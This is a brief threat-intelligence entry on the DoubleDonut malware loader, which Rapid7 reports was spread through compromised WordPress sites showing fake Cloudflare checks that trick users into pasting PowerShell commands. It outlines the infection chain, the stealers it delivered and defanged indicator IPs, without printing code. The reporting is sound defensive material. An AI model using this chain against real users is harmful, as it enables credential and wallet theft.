DoubleDonut

DoubleDonut is a two-stage Donut-based malware loader observed by Rapid7 in a large ClickFix campaign that used compromised legitimate WordPress websites to infect visitors, primarily on Windows systems. In this activity, attackers injected malicious JavaScript into WordPress sites or served it through WordPress admin-ajax endpoints, presenting a fake Cloudflare verification/CAPTCHA page that instructed users to paste a command into the Windows Run dialog. The resulting infection chain used PowerShell stagers to download shellcode such as cptch.bin and cptchbuild.bin, execute it in memory, and inject later stages into processes including svchost.exe. Rapid7 assessed that the campaign used the open-source Donut loader twice in sequence, referring to this component as “DoubleDonut” or the “DoubleDonut Loader.”

The campaign was described as active in this form since December 2025, with some supporting infrastructure dating to July/August 2025, and Rapid7 identified more than 250 compromised websites across at least 12 countries. DoubleDonut was used to deliver infostealer payloads including Vidar, a previously unnamed .NET stealer Rapid7 called Impure Stealer, and a newer C++ stealer dubbed VodkaStealer. The delivered payloads were capable of harvesting browser credentials, authentication cookies, cryptocurrency wallet data, and other sensitive information from infected devices. High-confidence infrastructure and infection-chain indicators mentioned in the reporting include 91.92.240[.]219, 178.16.53[.]70, 94.154.35[.]115, and later 172.94.9[.]187, along with shellcode filenames cptch.bin and cptchbuild.bin. The initial WordPress compromise vector was not confirmed, though weak administrator credentials and unpatched themes or plugins were cited as likely possibilities.